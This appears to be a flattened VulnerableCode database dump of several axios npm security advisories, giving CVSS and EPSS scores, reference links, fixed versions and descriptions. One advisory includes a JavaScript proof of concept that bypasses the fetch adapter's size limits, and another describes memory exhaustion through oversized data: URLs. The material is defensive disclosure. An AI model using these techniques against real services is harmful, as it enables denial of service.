scoring_system epss
scoring_elements 0.1867
published_at 2026-06-07T12:55:00Z
1
value 0.00059
scoring_system epss
scoring_elements 0.18708
published_at 2026-06-05T12:55:00Z
2
value 0.00059
scoring_system epss
scoring_elements 0.18711
published_at 2026-06-06T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-42033
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42033
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42033
3
reference_url https://github.com/axios/axios
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios
4
reference_url https://github.com/axios/axios/security/advisories/GHSA-pf86-5x62-jrwf
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-24T18:28:14Z/
url https://github.com/axios/axios/security/advisories/GHSA-pf86-5x62-jrwf
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-42033
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-42033
6
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878
reference_id 1134878
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878
7
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2461607
reference_id 2461607
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2461607
8
reference_url https://github.com/advisories/GHSA-pf86-5x62-jrwf
reference_id GHSA-pf86-5x62-jrwf
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-pf86-5x62-jrwf
9
reference_url https://access.redhat.com/errata/RHSA-2026:14937
reference_id RHSA-2026:14937
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:14937
10
reference_url https://access.redhat.com/errata/RHSA-2026:16476
reference_id RHSA-2026:16476
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:16476
11
reference_url https://access.redhat.com/errata/RHSA-2026:16532
reference_id RHSA-2026:16532
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:16532
12
reference_url https://access.redhat.com/errata/RHSA-2026:16534
reference_id RHSA-2026:16534
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:16534
13
reference_url https://access.redhat.com/errata/RHSA-2026:16535
reference_id RHSA-2026:16535
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:16535
14
reference_url https://access.redhat.com/errata/RHSA-2026:16542
reference_id RHSA-2026:16542
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:16542
15
reference_url https://access.redhat.com/errata/RHSA-2026:16874
reference_id RHSA-2026:16874
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:16874
16
reference_url https://access.redhat.com/errata/RHSA-2026:17468
reference_id RHSA-2026:17468
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:17468
17
reference_url https://access.redhat.com/errata/RHSA-2026:17474
reference_id RHSA-2026:17474
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:17474
18
reference_url https://access.redhat.com/errata/RHSA-2026:17657
reference_id RHSA-2026:17657
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:17657
19
reference_url https://access.redhat.com/errata/RHSA-2026:17699
reference_id RHSA-2026:17699
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:17699
20
reference_url https://access.redhat.com/errata/RHSA-2026:19109
reference_id RHSA-2026:19109
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:19109
21
reference_url https://access.redhat.com/errata/RHSA-2026:19375
reference_id RHSA-2026:19375
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:19375
22
reference_url https://access.redhat.com/errata/RHSA-2026:20889
reference_id RHSA-2026:20889
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:20889
23
reference_url https://access.redhat.com/errata/RHSA-2026:20938
reference_id RHSA-2026:20938
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:20938
24
reference_url https://access.redhat.com/errata/RHSA-2026:21017
reference_id RHSA-2026:21017
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:21017
25
reference_url https://access.redhat.com/errata/RHSA-2026:21338
reference_id RHSA-2026:21338
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:21338
26
reference_url https://access.redhat.com/errata/RHSA-2026:21772
reference_id RHSA-2026:21772
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:21772
27
reference_url https://access.redhat.com/errata/RHSA-2026:22465
reference_id RHSA-2026:22465
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:22465
28
reference_url https://access.redhat.com/errata/RHSA-2026:22619
reference_id RHSA-2026:22619
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:22619
29
reference_url https://access.redhat.com/errata/RHSA-2026:22629
reference_id RHSA-2026:22629
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:22629
30
reference_url https://access.redhat.com/errata/RHSA-2026:22840
reference_id RHSA-2026:22840
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:22840
31
reference_url https://access.redhat.com/errata/RHSA-2026:23361
reference_id RHSA-2026:23361
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:23361
fixed_packages
0
url pkg:npm/axios@1.15.1
purl pkg:npm/axios@1.15.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-8a5f-cd5t-mucc
1
vulnerability VCID-rusx-pwdw-zqcj
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.15.1
aliases CVE-2026-42033, GHSA-pf86-5x62-jrwf
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-6ru1-uamj-5ud3
4
url VCID-8a5f-cd5t-mucc
vulnerability_id VCID-8a5f-cd5t-mucc
summary axios: Axios: Invisible JSON Response Tampering via Prototype Pollution Gadget
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42044.json
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-42044.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-42044
reference_id
reference_type
scores
0
value 0.00188
scoring_system epss
scoring_elements 0.40525
published_at 2026-06-07T12:55:00Z
1
value 0.00188
scoring_system epss
scoring_elements 0.40549
published_at 2026-06-05T12:55:00Z
2
value 0.00188
scoring_system epss
scoring_elements 0.40552
published_at 2026-06-06T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-42044
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42044
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-42044
3
reference_url https://github.com/axios/axios
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios
4
reference_url https://github.com/axios/axios/security/advisories/GHSA-3w6x-2g7m-8v23
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T18:11:49Z/
url https://github.com/axios/axios/security/advisories/GHSA-3w6x-2g7m-8v23
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-42044
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-42044
6
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878
reference_id 1134878
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134878
7
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2461624
reference_id 2461624
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2461624
8
reference_url https://github.com/advisories/GHSA-3w6x-2g7m-8v23
reference_id GHSA-3w6x-2g7m-8v23
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-3w6x-2g7m-8v23
9
reference_url https://access.redhat.com/errata/RHSA-2026:16532
reference_id RHSA-2026:16532
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:16532
10
reference_url https://access.redhat.com/errata/RHSA-2026:16534
reference_id RHSA-2026:16534
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:16534
11
reference_url https://access.redhat.com/errata/RHSA-2026:16535
reference_id RHSA-2026:16535
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:16535
12
reference_url https://access.redhat.com/errata/RHSA-2026:16542
reference_id RHSA-2026:16542
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:16542
13
reference_url https://access.redhat.com/errata/RHSA-2026:17657
reference_id RHSA-2026:17657
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:17657
14
reference_url https://access.redhat.com/errata/RHSA-2026:17699
reference_id RHSA-2026:17699
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:17699
15
reference_url https://access.redhat.com/errata/RHSA-2026:19109
reference_id RHSA-2026:19109
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:19109
16
reference_url https://access.redhat.com/errata/RHSA-2026:19375
reference_id RHSA-2026:19375
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:19375
17
reference_url https://access.redhat.com/errata/RHSA-2026:20338
reference_id RHSA-2026:20338
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:20338
18
reference_url https://access.redhat.com/errata/RHSA-2026:20454
reference_id RHSA-2026:20454
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:20454
19
reference_url https://access.redhat.com/errata/RHSA-2026:20889
reference_id RHSA-2026:20889
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:20889
20
reference_url https://access.redhat.com/errata/RHSA-2026:20938
reference_id RHSA-2026:20938
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:20938
21
reference_url https://access.redhat.com/errata/RHSA-2026:21017
reference_id RHSA-2026:21017
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:21017
22
reference_url https://access.redhat.com/errata/RHSA-2026:21338
reference_id RHSA-2026:21338
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:21338
23
reference_url https://access.redhat.com/errata/RHSA-2026:21772
reference_id RHSA-2026:21772
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:21772
24
reference_url https://access.redhat.com/errata/RHSA-2026:22465
reference_id RHSA-2026:22465
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:22465
25
reference_url https://access.redhat.com/errata/RHSA-2026:22629
reference_id RHSA-2026:22629
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:22629
26
reference_url https://access.redhat.com/errata/RHSA-2026:22840
reference_id RHSA-2026:22840
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:22840
27
reference_url https://access.redhat.com/errata/RHSA-2026:23361
reference_id RHSA-2026:23361
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:23361
fixed_packages
0
url pkg:npm/axios@1.15.2
purl pkg:npm/axios@1.15.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-dqkm-8xjg-63hn
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.15.2
aliases CVE-2026-42044, GHSA-3w6x-2g7m-8v23
risk_score 3.4
exploitability 0.5
weighted_severity 6.7
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-8a5f-cd5t-mucc
5
url VCID-9ddj-ryra-5keb
vulnerability_id VCID-9ddj-ryra-5keb
summary 
Allocation of Resources Without Limits or Throttling in Axios
## Summary

Axios versions `1.7.0` through `1.15.x` did not enforce configured request and response size limits when requests were sent with the `fetch` adapter. Applications that selected `adapter: 'fetch'`, or ran in environments where axios resolved to the fetch adapter, could receive or send bodies larger than `maxContentLength` or `maxBodyLength` despite those limits being explicitly configured.

This can cause resource exhaustion in server-side usage when a malicious or compromised server returns an oversized response, when an attacker can supply a large `data:` URL, or when an application forwards attacker-controlled request bodies through axios while relying on `maxBodyLength` as a boundary.

## Impact

The impact is availability-only. Affected applications may process, buffer, or transmit data beyond the configured limit, potentially exhausting memory, CPU, or network resources.

This does not affect axios’s default unlimited behaviour by itself: `maxContentLength` and `maxBodyLength` default to `-1`. The vulnerability exists when an application has configured finite limits and expects axios to enforce them.

Server-side runtimes are the primary concern. Browser impact is generally constrained by the browser process and browser fetch behavior, and should not be described as server process exhaustion.

## Affected Functionality

Affected functionality includes requests using the built-in `fetch` adapter with finite `maxContentLength` or `maxBodyLength` values.

Relevant configurations include:

- `adapter: 'fetch'`
- `adapter: ['fetch', ...]` when `fetch` is selected
- environments where neither `xhr` nor `http` is available and axios falls back to `fetch`
- custom fetch environments configured through `env.fetch`

Unaffected functionality includes:

- Node.js default `http` adapter enforcement
- versions before the fetch adapter was introduced
- configurations that do not rely on finite axios size limits

## Technical Details

In vulnerable versions, `lib/adapters/fetch.js` destructured request config without `maxContentLength` or `maxBodyLength`. The adapter dispatched `fetch()` and then materialized the response through `text()`, `arrayBuffer()`, `blob()`, or related resolvers without checking the configured response limit.

The fix in `e5540dc` added:

- `maxContentLength` and `maxBodyLength` reads in `lib/adapters/fetch.js`
- upfront `data:` URL decoded-size checks
- outbound body-size checks before dispatch
- `Content-Length` response pre-checks
- streaming response enforcement
- fallback checks for environments without `ReadableStream`
- regression tests in `tests/unit/adapters/fetch.test.js`

## Proof of Concept of Attack

```js
import http from 'node:http';
import axios from 'axios';

const server = http.createServer((req, res) => {
  let received = 0;

  req.on('data', chunk => {
    received += chunk.length;
  });

  req.on('end', () => {
    res.end(JSON.stringify({ received }));
  });
});

await new Promise(resolve => server.listen(0, resolve));
const url = `http://127.0.0.1:${server.address().port}/`;

await axios.post(url, 'A'.repeat(2 * 1024 * 1024), {
  adapter: 'fetch',
  maxBodyLength: 1024
});

// Vulnerable versions succeed and the server receives 2097152 bytes.
// Fixed versions reject with ERR_BAD_REQUEST.

server.close();
```

## Workarounds

Use the Node.js `http` adapter for server-side requests where finite size limits are security-relevant.

Validate or cap attacker-controlled request bodies before passing them to axios.

Reject or strictly allowlist attacker-controlled URL schemes, especially `data:` URLs, before calling axios.

<details>
<summary>Original Report</summary>

### Summary
When Axios is used with adapter: 'fetch', configured body/response size limits are not enforced. This allows oversized uploads/downloads (including data: URLs) despite explicit limits, which can lead to memory/resource exhaustion in server-side usage.

### Details
maxBodyLength and maxContentLength are not applied in the fetch adapter flow:
  - lib/adapters/fetch.js (146-160): config destructuring does not include these controls.
  - lib/adapters/fetch.js (220-234): request is dispatched with fetch() without request-size enforcement.
  - lib/adapters/fetch.js (267-283): response is materialized via text(), arrayBuffer(), blob(), etc. without response-size checks.
By contrast, the HTTP adapter enforces both limits.

### PoC
  Environment:
  - Axios main at commit f7a4ee2
  - Node v24.2.0

Steps:
  1. Start an HTTP server that counts received bytes and echoes {received}.
  2. Send 2 MiB with:
      - adapter: 'fetch'
      - maxBodyLength: 1024
  3. Request a 4 KiB data: URL with:
      - adapter: 'fetch'
      - maxContentLength: 16

Expected secure behavior: both requests rejected.
 Observed:
  - Upload: success, server received 2097152
  - data: response: success, length 4096

### Impact
Type: DoS / resource exhaustion due to limit bypass.
Impacted: applications using Axios fetch adapter as a server-side security control boundary for untrusted request/response sizes.
</details>

---
references
0
reference_url https://github.com/axios/axios
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios
1
reference_url https://github.com/axios/axios/pull/10795
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios/pull/10795
2
reference_url https://github.com/axios/axios/pull/10796
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios/pull/10796
3
reference_url https://github.com/axios/axios/releases/tag/v1.16.0
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios/releases/tag/v1.16.0
4
reference_url https://github.com/axios/axios/security/advisories/GHSA-777c-7fjr-54vf
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios/security/advisories/GHSA-777c-7fjr-54vf
5
reference_url https://github.com/advisories/GHSA-777c-7fjr-54vf
reference_id GHSA-777c-7fjr-54vf
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-777c-7fjr-54vf
fixed_packages
0
url pkg:npm/axios@1.16.0
purl pkg:npm/axios@1.16.0
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.16.0
aliases CVE-2026-44488, GHSA-777c-7fjr-54vf
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-9ddj-ryra-5keb
6
url VCID-axy8-kmka-pugw
vulnerability_id VCID-axy8-kmka-pugw
summary 
Axios is vulnerable to DoS attack through lack of data size check
When Axios runs on Node.js and is given a URL with the `data:` scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (`Buffer`/`Blob`) and returns a synthetic 200 response.
This path ignores `maxContentLength` / `maxBodyLength` (which only protect HTTP responses), so an attacker can supply a very large `data:` URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested `responseType: 'stream'`.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-58754.json
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-58754.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-58754
reference_id
reference_type
scores
0
value 0.00257
scoring_system epss
scoring_elements 0.49294
published_at 2026-06-07T12:55:00Z
1
value 0.00257
scoring_system epss
scoring_elements 0.49302
published_at 2026-06-05T12:55:00Z
2
value 0.00257
scoring_system epss
scoring_elements 0.49312
published_at 2026-06-06T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-58754
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-58754
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-58754
3
reference_url https://github.com/axios/axios
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/axios/axios
4
reference_url https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/
url https://github.com/axios/axios/commit/945435fc51467303768202250debb8d4ae892593
5
reference_url https://github.com/axios/axios/commit/a1b1d3f073a988601583a604f5f9f5d05a3d0b67
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/
url https://github.com/axios/axios/commit/a1b1d3f073a988601583a604f5f9f5d05a3d0b67
6
reference_url https://github.com/axios/axios/commit/c30252f685e8f4326722de84923fcbc8cf557f06
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/
url https://github.com/axios/axios/commit/c30252f685e8f4326722de84923fcbc8cf557f06
7
reference_url https://github.com/axios/axios/pull/7011
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/
url https://github.com/axios/axios/pull/7011
8
reference_url https://github.com/axios/axios/pull/7034
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/
url https://github.com/axios/axios/pull/7034
9
reference_url https://github.com/axios/axios/releases/tag/v0.30.2
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/
url https://github.com/axios/axios/releases/tag/v0.30.2
10
reference_url https://github.com/axios/axios/releases/tag/v1.12.0
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/
url https://github.com/axios/axios/releases/tag/v1.12.0
11
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1114963
reference_id 1114963
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1114963
12
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2394735
reference_id 2394735
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2394735
13
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-58754
reference_id CVE-2025-58754
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-58754
14
reference_url https://github.com/advisories/GHSA-4hjh-wcwx-xvwj
reference_id GHSA-4hjh-wcwx-xvwj
reference_type
scores
url https://github.com/advisories/GHSA-4hjh-wcwx-xvwj
15
reference_url https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj
reference_id GHSA-4hjh-wcwx-xvwj
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-09-12T13:08:38Z/
url https://github.com/axios/axios/security/advisories/GHSA-4hjh-wcwx-xvwj
16
reference_url https://access.redhat.com/errata/RHSA-2025:16747
reference_id RHSA-2025:16747
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:16747
17
reference_url https://access.redhat.com/errata/RHSA-2025:18252
reference_id RHSA-2025:18252
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:18252
18
reference_url https://access.redhat.com/errata/RHSA-2025:19221
reference_id RHSA-2025:19221
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:19221
19
reference_url https://access.redhat.com/errata/RHSA-2025:19335
reference_id RHSA-2025:19335
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:19335
20
reference_url https://access.redhat.com/errata/RHSA-2025:19375
reference_id RHSA-2025:19375
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:19375
21
reference_url https://access.redhat.com/errata/RHSA-2025:19529
reference_id RHSA-2025:19529
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:19529
22
reference_url https://access.redhat.com/errata/RHSA-2025:19804
reference_id RHSA-2025:19804
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:19804
23
reference_url https://access.redhat.com/errata/RHSA-2025:19961
reference_id RHSA-2025:19961
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:19961
24
reference_url https://access.redhat.com/errata/RHSA-2025:22684
reference_id RHSA-2025:22684
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:22684
25
reference_url https://access.redhat.com/errata/RHSA-2025:22759
reference_id RHSA-2025:22759
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:22759
26
reference_url https://access.redhat.com/errata/RHSA-2025:23069
reference_id RHSA-2025:23069
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:23069
27
reference_url https://access.redhat.com/errata/RHSA-2025:23131
reference_id RHSA-2025:23131
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:23131
28
reference_url https://access.redhat.com/errata/RHSA-2025:23546
reference_id RHSA-2025:23546
reference_type
scores
url https://access.redhat.com/errata/RHSA-2025:23546
29
reference_url https://access.redhat.com/errata/RHSA-2026:0627
reference_id RHSA-2026:0627
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:0627
30
reference_url https://access.redhat.com/errata/RHSA-2026:0718
reference_id RHSA-2026:0718
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:0718
31
reference_url https://access.redhat.com/errata/RHSA-2026:1018
reference_id RHSA-2026:1018
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:1018
32
reference_url https://access.redhat.com/errata/RHSA-2026:1942
reference_id RHSA-2026:1942
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:1942
33
reference_url https://access.redhat.com/errata/RHSA-2026:4215
reference_id RHSA-2026:4215
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:4215
34
reference_url https://access.redhat.com/errata/RHSA-2026:6226
reference_id RHSA-2026:6226
reference_type
scores
url https://access.redhat.com/errata/RHSA-2026:6226
fixed_packages
0
url pkg:npm/axios@1.12.0
purl pkg:npm/axios@1.12.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-37kj-pzyt-8be6
1
vulnerability VCID-4b7a-22xk-gbh9
2
vulnerability VCID-5kg1-k416-dfc1
3
vulnerability VCID-6ru1-uamj-5ud3
4
vulnerability VCID-8a5f-cd5t-mucc
5
vulnerability VCID-gp41-4j8d-37ce
6
vulnerability VCID-hadc-5d2f-gqe6
7
vulnerability VCID-jvs6-8bva-nqb3
8
vulnerability VCID-kwj2-mk8c-4fef
9
vulnerability VCID-rusx-pwdw-zqcj
10
vulnerability VCID-td7u-cct6-bud6
11
vulnerability VCID-vzqt-dj1z-bqa6
12
vulnerability VCID-xdas-dhtb-nuge
13
vulnerability VCID-xg1x-4spz-jucn
14
vulnerability VCID-yu5y-e4bk-zyfp
15
vulnerability VCID-z5pf-pqcd-ckas
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/axios@1.12.0
aliases CVE-2025-58754, GHSA-4hjh-wcwx-xvwj
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-axy8-kmka-pugw
7
